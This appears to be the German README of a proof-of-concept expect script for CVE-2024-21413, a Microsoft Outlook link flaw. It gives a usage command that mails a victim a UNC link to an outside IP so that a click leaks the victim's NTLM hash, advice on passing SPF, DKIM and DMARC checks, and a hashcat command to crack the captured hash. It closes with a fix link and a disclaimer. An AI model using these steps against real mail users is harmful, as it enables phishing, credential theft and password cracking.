
Microsoft Outlook Schwachstelle zur Offenlegung von Informationen (leakt Passwort-Hash) - Expect-Skript POC
Microsoft Outlook-Leck von Anmeldedaten & Schwachstelle für Remote-Codeausführung, wenn sie mit CVE-2023-21716 verkettet wird (über das Vorschaufenster) CVSS:3.1 9.8 / 8.5
Outlook sollte Sie über das Risiko beim Öffnen eines externen Links warnen => aber das ist nicht der Fall!

Verwendung: ./cve-2024-21413.sh mx.fqdn port sender recipient url
./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"
Hinweise: chmod +x cve-2024-21413.sh
Erfordert die App expect & eine legitime Absender-IP und E-Mail-Absenderadresse (um SPF, DKIM, DMARC zu bestehen)



danach sollten Sie den Login und den Hash der Person erhalten, die auf den Link geklickt hat (ohne den Warnhinweis auf betroffenen Outlook-Versionen)

Danach können Sie versuchen, das Passwort mit hashcat zu knacken. Kopieren Sie einfach die gesamte Zeile mit dem Login-Namen in eine Datei und führen Sie hashcat mit Modul 5600 aus
hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O
Workaround/Fix: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]
mehr über mich ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Haftungsausschluss: WICHTIG: Dieses Skript wird ausschließlich für Bildungszwecke, ethische Tests und rechtmäßige Verwendung bereitgestellt. Verwenden Sie es nicht auf einem System oder Netzwerk ohne ausdrückliche Erlaubnis. Unbefugter Zugriff auf Computersysteme und Netzwerke ist illegal, und Benutzer, die bei unbefugten Aktivitäten erwischt werden, müssen mit rechtlichen Schritten rechnen. Der Autor ist NICHT verantwortlich für Schäden, die durch die missbräuchliche Verwendung dieses Skripts entstehen.